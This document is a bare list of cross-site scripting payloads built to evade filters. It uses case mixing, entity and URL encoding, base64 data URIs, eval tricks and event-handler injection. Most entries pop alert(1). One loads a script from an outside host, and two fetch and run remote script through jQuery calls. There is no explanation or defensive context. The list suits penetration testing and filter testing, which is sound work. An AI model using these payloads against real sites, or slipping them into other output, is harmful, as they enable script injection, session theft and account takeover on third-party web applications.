"'>
</xss>
<sCrIt>alert(1)</SCRIPT>
<script>alert`1`</script>
<script>a=eval;b=alert;a(b(/i/.source));</script>
<script>eval(630038579..toString(30))(1)</script>
<script src="//0-q.cc/uGuMag"></scrIpt>
<script>alert%0a%0d(1);</script>
<img src=x onerror="al%26%23x65rt(1)">
<svg/onload=aler%26%23x74(1)>
<svg><script>alert&#x0028;1)</script>
<object data="dat%26%23x61:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="dat%26%23x61:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<input value=x oncut=aler%26%23x74(1)>
<input type=image src=0 onerror=alert(1)>
<script/src=data:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script>
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<iframe src="javascript:alert(1)"
<iframe srcdoc="&lt;svg/onload=alert(1)&gt;"></iframe>
<base href="javascript:\"><a href=/**/alert(1)>XSS</a>
<a href=*/alert(1)>XSS</a><base href="javascript:/*\">
<noembed><img src="</noembed><iframe onload=alert(1)>" /></noembed>
<img/src=="x onerror=alert(1)//">
<body onresize="alert(1)"> 
<details ontoggle=$.getScript(x)>
<video%20onloadstart="$.get%26%2383cript(x)"><source%20src=></video>

